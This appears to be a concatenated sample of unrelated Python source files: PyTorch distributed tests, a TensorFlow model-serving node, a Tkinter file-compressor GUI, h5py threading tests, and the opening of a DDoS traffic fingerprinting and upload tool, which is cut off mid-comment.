def _test_sequence_num_set_default_pg(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
def _test_warn_not_in_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
in_group_ranks = list(filter(lambda x: x % 2 == 0, range(self.world_size)))
group = dist.new_group(in_group_ranks)
x = torch.zeros(2, 2).cuda(self.rank)
xs = [torch.zeros(2, 2).cuda(self.rank) for _ in range(len(in_group_ranks))]
if self.rank not in in_group_ranks:
msg = ".*{}.*does not belong to.*"
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_gather")):
dist.all_gather(xs, x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_reduce")):
dist.all_reduce(x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("barrier")):
dist.barrier(group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("broadcast")):
dist.broadcast(x, src=0, group=group)
else:
dist.all_gather(xs, x, group=group)
dist.all_reduce(x, group=group)
dist.barrier(group=group)
dist.broadcast(x, src=0, group=group)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_debug_level(self):
try:
del os.environ["TORCH_DISTRIBUTED_DEBUG"]
except KeyError:
pass
dist.set_debug_level_from_env()
# Default should be off
default_debug_mode = dist.get_debug_level()
self.assertEqual(default_debug_mode, dist.DebugLevel.OFF)
mapping = {
"OFF": dist.DebugLevel.OFF,
"off": dist.DebugLevel.OFF,
"oFf": dist.DebugLevel.OFF,
"INFO": dist.DebugLevel.INFO,
"info": dist.DebugLevel.INFO,
"INfO": dist.DebugLevel.INFO,
"DETAIL": dist.DebugLevel.DETAIL,
"detail": dist.DebugLevel.DETAIL,
"DeTaIl": dist.DebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
dist.set_debug_level_from_env()
set_debug_mode = dist.get_debug_level()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "The value of TORCH_DISTRIBUTED_DEBUG must"):
dist.set_debug_level_from_env()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def barrier(self, opts=None):
store = c10d._get_default_store()
key = "TEST:DummyProcessGroup:barrier"
if self.rank() == 0:
worker_count = 0
# By default, TCPServer lives on rank 0. So rank 0 needs to make
# sure that it does not exit too early before other ranks finish
# using the store.
# Note that, _store_based_barrier does not solve this problem, as
# all ranks need to run at least one store.add(key, 0) before
# exiting, but there is no guarantee that rank 0 is still alive at
# that point.
while worker_count < self.size() - 1:
worker_count = store.add(key, 0)
else:
store.add(key, 1)
return DummyWork()
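    # Illustrative trace of the store-based count above for size() == 3
    # (assuming store.add atomically increments the key and returns the new
    # value): ranks 1 and 2 each call store.add(key, 1), so rank 0 keeps
    # polling store.add(key, 0) until it observes 2 == size() - 1 and only
    # then returns, keeping the TCPStore alive until every rank has arrived.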
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupExtensionTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupExtensionTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupExtensionTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupExtensionTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupExtensionTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.barrier()
dist.destroy_process_group()
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
dist.barrier()
        # intentionally not calling into `destroy_process_group` as not all
        # user applications would explicitly call that.
instantiate_parametrized_tests(CommonDistributedDataParallelTest)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
node.py
|
import orjson as json
import queue
import socket
from threading import Thread
from queue import Queue
import select
import time
import numpy as np
import tensorflow as tf
from node_state import NodeState, socket_recv, socket_send
import zfpy
import lz4.frame
# port 5000 is data, 5001 is model architecture, 5002 is weights
class Node:
def _model_socket(self, node_state: NodeState):
model_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
model_server.bind(("0.0.0.0", 5001))
print("Model socket running")
model_server.listen(1)
model_cli = model_server.accept()[0]
model_cli.setblocking(0)
model_json = socket_recv(model_cli, node_state.chunk_size)
next_node = socket_recv(model_cli, chunk_size=1)
part = tf.keras.models.model_from_json(model_json)
while (node_state.weights == ""): # Waiting for weights to be sent on other thread
time.sleep(5)
part.set_weights(node_state.weights)
id = socket.gethostbyname(socket.gethostname())
md = part
md._make_predict_function()
node_state.model = md
tf.keras.utils.plot_model(md, f"model_{id}.png")
node_state.next_node = next_node.decode()
select.select([], [model_cli], [])
model_cli.send(b'\x06')
model_server.close()
def _weights_socket(self, node_state):
chunk_size = node_state.chunk_size
weights_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
weights_server.bind(("0.0.0.0", 5002))
weights_server.listen(1)
weights_cli = weights_server.accept()[0]
weights_cli.setblocking(0)
model_weights = self._recv_weights(weights_cli, chunk_size)
node_state.weights = model_weights
weights_server.close()
def _recv_weights(self, sock: socket.socket, chunk_size: int):
size_left = 8
byts = bytearray()
while size_left > 0:
try:
recv = sock.recv(min(size_left, 8))
size_left -= len(recv)
byts.extend(recv)
except socket.error as e:
if e.errno != socket.EAGAIN:
raise e
select.select([sock], [], [])
array_len = int.from_bytes(byts, 'big')
weights = []
for i in range(array_len):
recv = bytes(socket_recv(sock, chunk_size))
weights.append(self._decomp(recv))
return weights
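    # Sketch of the sender side this receiver expects (an assumption inferred
    # from the parsing above; the real sender lives in another component):
    # first an 8-byte big-endian count of weight arrays, then one compressed
    # payload per array, e.g.
    #   sock.sendall(len(weights).to_bytes(8, 'big'))
    #   for arr in weights:
    #       socket_send(self._comp(arr), sock, chunk_size)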
def _comp(self, arr):
return lz4.frame.compress(zfpy.compress_numpy(arr))
def _decomp(self, byts):
return zfpy.decompress_numpy(lz4.frame.decompress(byts))
def _data_server(self, node_state: NodeState, to_send: Queue):
chunk_size = node_state.chunk_size
data_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data_server.bind(("0.0.0.0", 5000))
data_server.listen(1)
data_cli = data_server.accept()[0]
data_cli.setblocking(0)
while True:
data = bytes(socket_recv(data_cli, chunk_size))
inpt = zfpy.decompress_numpy(data)
to_send.put(inpt)
def _data_client(self, node_state: NodeState, to_send: Queue):
graph = tf.get_default_graph()
while node_state.next_node == "":
time.sleep(5)# Wait until next_node is set by model socket
chunk_size = node_state.chunk_size
model = node_state.model
next_node_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
next_node_client.connect((node_state.next_node, 5000))
next_node_client.setblocking(0)
while True:
inpt = to_send.get()
with graph.as_default():
output = model.predict(inpt)
out = self._comp(output)
socket_send(out, next_node_client, chunk_size)
def run(self):
ns = NodeState(chunk_size = 512 * 1000)
m = Thread(target=self._model_socket, args=(ns,))
w = Thread(target=self._weights_socket, args=(ns,))
to_send = queue.Queue(1000) # Arbitrary size of queue, can change later
dserv = Thread(target=self._data_server, args=(ns, to_send))
dcli = Thread(target=self._data_client, args=(ns, to_send))
m.start()
w.start()
dserv.start()
dcli.start()
m.join()
w.join()
dserv.join()
dcli.join()
node = Node()
node.run()
|
interface.py
|
# coding: utf-8
# Interface module
# This module builds the program's graphical user interface
# Author: Marcos Castro
from Tkinter import *  # Tkinter functions
from tkFileDialog import askopenfilename  # function to choose a file
from compactador import *  # compactador (compression) module
import tkMessageBox  # message box
from threading import Thread  # thread module
class Aplicacao:
    def __init__(self, master):
        # create a frame, the container that will hold the widgets
        self.frame = Frame(master)  # master is the Tk instance
        # pack is a geometry manager
        # the geometry manager gives the widget a location on screen
        # without it the widget exists but is not visible to the user
        self.frame.pack()
        # create the "Adicionar" (add) button
        # pass the parent, label, event callback and border width
        self.botao_adicionar = Button(self.frame, text="Adicionar", command=self.adicionar, bd=3)
        self.botao_adicionar['font'] = ('Arial', 12)  # set a font
        self.botao_adicionar.pack(pady=10, padx=30, side="left")
        # create the "Deletar" (delete) button, similar to the add button
        self.botao_deletar = Button(self.frame, text="Deletar", command=self.deletar, bd=3)
        self.botao_deletar['font'] = ('Arial', 12)
        self.botao_deletar.pack(padx=30, side="right")
        # create another frame
        self.frame2 = Frame(master)
        self.frame2.pack()
        # create a vertical scrollbar
        self.sby = Scrollbar(self.frame2)
        self.sby.pack(side=RIGHT, fill=Y)
        # create a horizontal scrollbar
        self.sbx = Scrollbar(self.frame2, orient=HORIZONTAL)
        self.sbx.pack(side=BOTTOM, fill=X)
        # create a listbox
        self.listbox = Listbox(self.frame2, width=50, height=10, selectmode=EXTENDED)
        # selectmode=EXTENDED allows selecting more than one item
        self.listbox.pack()
        # attach the listbox to the vertical and horizontal scrollbars
        self.listbox.config(yscrollcommand=self.sby.set)
        self.sby.config(command=self.listbox.yview)
        self.listbox.config(xscrollcommand=self.sbx.set)
        self.sbx.config(command=self.listbox.xview)
        # create another frame
        self.frame3 = Frame(master)
        self.frame3.pack()
        # create the "Compactar" (compress) button
        self.botao_compactar = Button(self.frame3, text="Compactar", command=self.compactar, bd=3)
        self.botao_compactar['font'] = ('Arial', 12)
        self.botao_compactar.pack(pady=10)
    # callback for the add button event
    def adicionar(self):
        # open a dialog to choose a file
        nome_arquivo = askopenfilename()
        if nome_arquivo != "":  # if something was chosen
            self.listbox.insert(END, nome_arquivo)
    # callback for the delete button event
    # this function deletes the selected items
    def deletar(self):
        items = self.listbox.curselection()  # get the list of selected indices
        if len(items) == 0:
            tkMessageBox.showinfo("Compactador", "Selecione pelo menos um item!")
        else:
            pos = 0
            for i in items:  # iterate over the list of indices
                item_pos = int(i) - pos  # position of the selected item
                self.listbox.delete(item_pos, item_pos)  # delete the selected item
                pos = pos + 1  # increment pos
    # callback for the compress button event
    def compactar(self):
        # get every item from the listbox
        lista_arquivos = self.listbox.get(0, END)
        if len(lista_arquivos) == 0:
            tkMessageBox.showinfo("Compactador", "Adicione algum arquivo para compactar!")
            return  # leave the function
        def executar():
            self.botao_compactar.configure(state=DISABLED)  # disable the button
            # the list is not empty, so compress it
            compactador = Compactador()  # get a Compactador instance
            compactador.compactar(lista_arquivos)  # compress all the files
            self.botao_compactar.configure(state=NORMAL)  # enable the button again
        t = Thread(target=executar)  # create the thread
        t.start()  # start the thread
root = Tk()  # get a Tk instance
root.title("Compactador de arquivos")  # set the window title
root.iconbitmap(default="icone.ico")  # set an icon
root.geometry('400x300')  # set the window size
root.resizable(width=FALSE, height=FALSE)  # disable window resizing
Aplicacao(root)  # pass the Tk instance to the Aplicacao class
root.mainloop()  # application event loop
|
test_threads.py
|
# This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
    Tests that HDF5 error printing is squashed in non-main threads.
"""
from __future__ import absolute_import
import threading
import h5py
from ..common import ut, TestCase
class TestErrorPrinting(TestCase):
"""
Verify the error printing is squashed in all threads.
"""
def test_printing(self):
""" No console messages should be shown from containership tests """
# Unfortunately we can't have this test assert anything, as
# HDF5 writes directly to stderr. But it will show up in the
# console output.
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
try:
doesnt_exist = newfile['doesnt_exist'].value
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
def test_attr_printing(self):
""" No console messages should be shown for non-existing attributes """
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
newfile['newdata'] = [1,2,3]
try:
nonexistent_attr = newfile['newdata'].attrs['nonexistent_attr']
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
|
ddos_dissector.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
# Concordia Project
#
# This project has received funding from the European Union’s Horizon
# 2020 Research and Innovation program under Grant Agreement No 830927.
#
# Joao Ceron - joaoceron@sidn.nl
###############################################################################
###############################################################################
### Python modules
import time
import threading
import sys
import subprocess
import socket
import signal
import shutil
import requests
import re
import copy
import queue
import pandas as pd
import os
import numpy as np
import logging
import json
import hashlib
import cursor
import configparser
import ipaddr
import argparse
from subprocess import check_output, STDOUT
from pygments.lexers import JsonLexer
from pygments.formatters import TerminalFormatter
from pygments import highlight
from io import StringIO
from datetime import datetime
from argparse import RawTextHelpFormatter
from hashlib import sha256
###############################################################################
### Program settings
verbose = False
program_name = os.path.basename(__file__)
version = "3.1"
# GLOBAL parameters
# percentage used to determine the correlation between two lists
SIMILARITY_THRESHOLD = 80
NONE = -1
FLOW_TYPE = 0
PCAP_TYPE = 1
###############################################################################
### Subrotines
#------------------------------------------------------------------------------
def parser_add_arguments():
"""
    Parse command line parameters
"""
parser = argparse.ArgumentParser(prog=program_name, usage='%(prog)s [options]', epilog="Example: ./%(prog)s -f ./pcap_samples/sample1.pcap --summary --upload ", formatter_class=RawTextHelpFormatter)
parser.add_argument("--version", help="print version and exit", action="store_true")
parser.add_argument("-v","--verbose", help="print info msg", action="store_true")
parser.add_argument("-d","--debug", help="print debug info", action="store_true")
parser.add_argument("-q","--quiet", help="ignore animation", action="store_true")
parser.add_argument("--status", dest='status', help="check available repositories", action="store_true")
parser.add_argument("-s","--summary", help="present fingerprint evaluation summary", action="store_true")
parser.add_argument("-u","--upload", help="upload to the selected repository", action="store_true")
parser.add_argument("--log", default='log.txt', nargs='?',help="Log filename. Default =./log.txt\"")
parser.add_argument("--fingerprint_dir", default='fingerprints', nargs='?',help="Fingerprint storage directory. Default =./fingerprints\"")
parser.add_argument("--config", default='ddosdb.conf', nargs='?',help="Configuration File. Default =./ddosdb.conf\"")
parser.add_argument("--host", nargs='?',help="Upload host. ")
parser.add_argument("--user", nargs='?',help="repository user. ")
parser.add_argument("--passwd", nargs='?',help="repository password.")
parser.add_argument("-g","--graph", help="build dot file (graphviz). It can be used to plot a visual representation\n of the attack using the tool graphviz. When this option is set, youn will\n received information how to convert the generate file (.dot) to image (.png).", action="store_true")
parser.add_argument('-f','--filename', nargs='?', required=False, help="")
return parser
#------------------------------------------------------------------------------
def signal_handler(signum, handler):
"""
Signal handler
"""
sys.stdout.flush()
print('\nCtrl+C detected.')
cursor.show()
sys.exit(0)
#------------------------------------------------------------------------------
class CustomConsoleFormatter(logging.Formatter):
"""
Log facility format
"""
def format(self, record):
formater = "%(levelname)s - %(message)s"
if record.levelno == logging.INFO:
GREEN = '\033[32m'
reset = "\x1b[0m"
log_fmt = GREEN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.DEBUG:
CYAN = '\033[36m'
reset = "\x1b[0m"
log_fmt = CYAN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.ERROR:
MAGENTA = '\033[35m'
reset = "\x1b[0m"
log_fmt = MAGENTA + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.WARNING:
YELLOW = '\033[33m'
reset = "\x1b[0m"
log_fmt = YELLOW + formater + reset
self._style._fmt = log_fmt
else:
self._style._fmt = formater
return super().format(record)
#------------------------------------------------------------------------------
def logger(args):
"""
    Instantiate the logging facility. By default, info logs are also
    stored in the logfile.
    :param args: cmd line args
"""
logger = logging.getLogger(__name__)
# root logging
if (args.debug):
logger.setLevel(logging.DEBUG)
elif (args.verbose):
logger.setLevel(logging.INFO)
# Create handlers
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(args.log)
#console_handler.setLevel(logging.DEBUG)
file_handler.setLevel(logging.INFO)
    # add custom formatter
my_formatter = CustomConsoleFormatter()
console_handler.setFormatter(my_formatter)
f_format = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)")
file_handler.setFormatter(f_format)
# add handlers to the logger
logger.addHandler(console_handler)
logger.addHandler(file_handler)
return logger
#------------------------------------------------------------------------------
def upload(fingerprint, json_file, user, passw, host, key):
"""
Upload a fingerprint and attack vector to DDoSDB
:param fingerprint: Path to the fingerprint file
:param json_file: fingerprint generated file
    :param user: DDoSDB username
    :param passw: DDoSDB password
    :param host: repository URL
    :param key: fingerprint identifier (used as the upload filename)
    :return: status_code describing the HTTP code received
"""
if not os.path.isfile(json_file):
logger.critical("Could not read the fingerprint json file {}".format(json_file))
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
# build headers for repo fingerprint submission
headers = {
"X-Username": user,
"X-Password": passw,
"X-Filename": key
}
try:
r = requests.post(host+"upload-file", files=files, headers=headers,verify=True)
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to upload fingerprint")
logger.debug("Cannot connect to the server to upload fingerprint: {}".format(e))
print (e)
return None
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
elif (r.status_code==201):
print ("Upload success: \n\tHTTP CODE [{}] \n\tFingerprint ID [{}]".format(r.status_code,key))
print ("\tURL: {}query?q={}".format(host,key))
else:
print ("Internal Server Error. Check repository Django logs.")
print ("Error Code: {}".format(r.status_code))
return r.status_code
#------------------------------------------------------------------------------
def get_repository(args,config):
"""
Check credentials and repository based on configuration file or cmd line args
:param args: cmd args
:param config: configuration file
return: user,pass,host: credentials for the repository
"""
user,passw,host = (None,)*3
# look for the repository to upload
if not (args.host):
logger.info("Upload host not defined. Pick the first one in the configuration file.")
config_host = config.sections()[0]
if not (config_host):
logger.critical("Could not find repository configuration. Check configuration file [dddosdb.conf].")
else:
logger.info("Assumming configuration section [{}].".format(config_host))
user = config[config_host]['user']
passw = config[config_host]['passwd']
host = config[config_host]['host']
elif args.host:
host = args.host
if (args.user and args.passwd):
user = args.user
passw = args.passwd
# user/pass not defined by cmd line
else:
# try to find in the configuration file
if args.host in config.sections():
logger.info("Host found in the configuration file")
user = config[args.host]['user']
passw = config[args.host]['passwd']
else:
logger.critical("Credentials not found for [{}].".format(args.host))
else:
logger.critical("Cannot find repository {} credentials. You should define in the cmd line or configuration file [dddosdb.conf].".format(args.host))
return None
return (user,passw,host)
#------------------------------------------------------------------------------
def prepare_tshark_cmd(input_path):
"""
Prepare the tshark command that converts a PCAP to a CSV.
:param input_path: filename
return: tshark command line to be used to convert the file
"""
tshark = shutil.which("tshark")
if not tshark:
logger.error("Tshark software not found. It should be on the path.\n")
return
cmd = [tshark, '-r', input_path, '-T', 'fields']
# fields included in the csv
fields = [
'dns.qry.type', 'ip.dst','ip.flags.mf', 'tcp.flags', 'ip.proto',
'ip.src', '_ws.col.Destination', '_ws.col.Protocol', '_ws.col.Source',
'dns.qry.name', 'eth.type', 'frame.len', '_ws.col.Info', 'udp.length',
'http.request', 'http.response', 'http.user_agent', 'icmp.type',
'ip.frag_offset', 'ip.ttl', 'ntp.priv.reqcode', 'tcp.dstport',
'tcp.srcport', 'udp.dstport', 'udp.srcport', 'frame.time_epoch',
]
for f in fields:
cmd.append('-e')
cmd.append(f)
# field options
options = ['header=y', 'separator=,', 'quote=d', 'occurrence=f' ]
for o in options:
cmd.append('-E')
cmd.append(o)
return cmd
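# Example of the command assembled above (illustrative, field list abbreviated):
#   tshark -r capture.pcap -T fields -e dns.qry.type -e ip.dst ... -e frame.time_epoch \
#          -E header=y -E separator=, -E quote=d -E occurrence=f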
#------------------------------------------------------------------------------
def flow_to_df(ret,filename):
"""
Convert flow file (nfdump) to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
nfdump = shutil.which("nfdump")
    if not nfdump:
        logger.error("NFDUMP software not found. It should be on the path.")
        ret.put(NONE)
        sys.exit()
    cmd = [nfdump, '-r', filename, '-o', 'extended', '-o', 'json']
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_json(data).fillna(NONE)
df = df[['t_first', 't_last', 'proto', 'src4_addr', 'dst4_addr',
'src_port', 'dst_port', 'fwd_status', 'tcp_flags',
'src_tos', 'in_packets', 'in_bytes', 'icmp_type',
'icmp_code',
]]
df = df.rename(columns={'dst4_addr': 'ip_dst',
'src4_addr': 'ip_src',
'src_port': 'srcport',
'dst_port': 'dstport',
't_start' : 'frame_time_epoch',
})
df.dstport = df.dstport.astype(float).astype(int)
df.srcport = df.srcport.astype(float).astype(int)
# convert protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['proto'] = df['proto'].apply(lambda x: protocol_names[x])
# convert protocol/port to service
def convert_protocol_service(row):
try:
highest_protocol = socket.getservbyport(row['dstport'], row['proto'].lower()).upper()
return highest_protocol
except:
return "UNKNOWN"
df['highest_protocol'] = df[['dstport','proto']].apply(convert_protocol_service,axis=1)
# convert to unix epoch (sec)
df['frame_time_epoch'] = pd.to_datetime(df['t_first']).astype(int) / 10**9
df = df.drop(['t_last','t_first','fwd_status'],axis=1)
ret.put(df)
#------------------------------------------------------------------------------
def pcap_to_df(ret,filename):
"""
Convert pcap file to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
cmd = prepare_tshark_cmd(filename)
if not cmd:
ret.put(NONE)
sys.exit()
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_csv(data,low_memory=False,error_bad_lines=False)
# src/dst port
if (set(['tcp.srcport','udp.srcport','tcp.dstport','udp.dstport']).issubset(df.columns)):
# Combine source and destination ports from tcp and udp
df['srcport'] = df['tcp.srcport'].fillna(df['udp.srcport'])
df['dstport'] = df['tcp.dstport'].fillna(df['udp.dstport'])
df['dstport'] = df['dstport'].fillna(NONE).astype(float).astype(int)
df['srcport'] = df['srcport'].fillna(NONE).astype(float).astype(int)
if (set(['ip.src','ip.dst','_ws.col.Source','_ws.col.Destination']).issubset(df.columns)):
# Combine source and destination IP - works for IPv6
df['ip.src'] = df['ip.src'].fillna(df['_ws.col.Source'])
df['ip.dst'] = df['ip.dst'].fillna(df['_ws.col.Destination'])
# rename protocol field
df = df.rename({'_ws.col.Protocol': 'highest_protocol'},axis=1)
# protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['ip.proto'] = df['ip.proto'].fillna(NONE).astype(float).astype(int)
df['ip.proto'] = df['ip.proto'].apply(lambda x: protocol_names[x] if (x>0) else -1)
df['ip.ttl'] = df['ip.ttl'].fillna(NONE).astype(float).astype(int)
df['udp.length'] = df['udp.length'].fillna(NONE).astype(float).astype(int)
df['ntp.priv.reqcode'] = df['ntp.priv.reqcode'].fillna(NONE).astype(float).astype(int)
# timestamp
df['start_timestamp'] = df['frame.time_epoch'].iloc[0]
# Remove columns: 'tcp.srcport', 'udp.srcport','tcp.dstport', 'udp.dstport', _ws.col.Source, _ws.col.Destination
df.drop(['tcp.srcport', 'udp.srcport', 'tcp.dstport', 'udp.dstport','_ws.col.Source', '_ws.col.Destination'], axis=1, inplace=True)
    # Drop all empty columns (makes the analysis more efficient and uses less memory)
df.dropna(axis=1, how='all', inplace=True)
df = df.fillna(NONE)
if 'icmp.type' in df.columns:
df['icmp.type'] = df['icmp.type'].astype(int)
if 'dns.qry.type' in df.columns:
df['dns.qry.type'] = df['dns.qry.type'].astype(int)
if 'ip.frag_offset' in df.columns:
df['ip.frag_offset'] = df['ip.frag_offset'].astype(str)
if 'ip.flags.mf' in df.columns:
df['ip.flags.mf'] = df['ip.flags.mf'].astype(str)
if ('ip.flags.mf' in df.columns) and ('ip.frag_offset' in df.columns):
# Analyse fragmented packets
df['fragmentation'] = (df['ip.flags.mf'] == '1') | (df['ip.frag_offset'] != '0')
df.drop(['ip.flags.mf', 'ip.frag_offset'], axis=1, inplace=True)
# translate flags to string
# if 'tcp.flags.str' in df.columns:
# df['tcp.flags.str'] = df['tcp.flags.str'].str.encode("utf-8")
df.columns = [c.replace('.', '_') for c in df.columns]
# remove info field
del df['_ws_col_Info']
ret.put(df)
#------------------------------------------------------------------------------
## Function for calculating the top N values and aggregating the 'others'
## Creates a dataframe with the top N values plus an 'others' category
def top_n_dataframe(dataframe_field,df,n_type,top_n=20):
"""
Find top n values in one dataframe
:param dataframe_field: field to be evaluated
:param df: full dataframe
:param n_type: network file type (pcap or flow)
:param top_n: build dataframe with the top_n results
return df: dataframe itself
"""
field_name = dataframe_field.name
if (field_name == "frame_time_epoch" or field_name=="start_timestamp"):
return pd.DataFrame()
# flow - different heuristic
if (n_type==FLOW_TYPE):
if (field_name == "in_packets"):
return pd.DataFrame()
data = df.groupby(field_name)["in_packets"].sum().sort_values(ascending=False)
top = data[:top_n].reset_index()
top.columns = [field_name,'count']
new_row = pd.DataFrame(data = {
'count' : [ data[top_n:].reset_index().iloc[:,1].sum()],
field_name : ['others'],
})
# pcap
else:
top = df[field_name].value_counts().reset_index()[:top_n]
new_row = pd.DataFrame(data = {
'count' : [df[field_name].value_counts().reset_index()[top_n:][field_name].sum()],
field_name : ['others'],
})
# combine the result dataframe (top_n + aggregated 'others')
top.columns = [field_name, 'count']
top_result = pd.concat([top, new_row],sort=False)
# percentage field
df = top_result.groupby(field_name).sum()
df=df.sort_values(by="count", ascending=False)
df['percent'] = df.transform(lambda x: (x/np.sum(x)*100).round()).astype(int)
if (len(df)< 16):
# z-score useless when few elements
df['zscore'] = NONE
else:
# z-score of 2 indicates that an observation is two standard deviations above the average
# a z-score of zero represents a value that equals the mean.
df['zscore'] = ((df['count'] - df['count'].mean())/df['count'].std(ddof=0)).round().fillna(NONE)
return (df.reset_index())
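# Worked example for the zscore column (illustrative numbers, ignoring the
# small-sample shortcut above): for counts [2799, 1842, 86] the mean is ~1576
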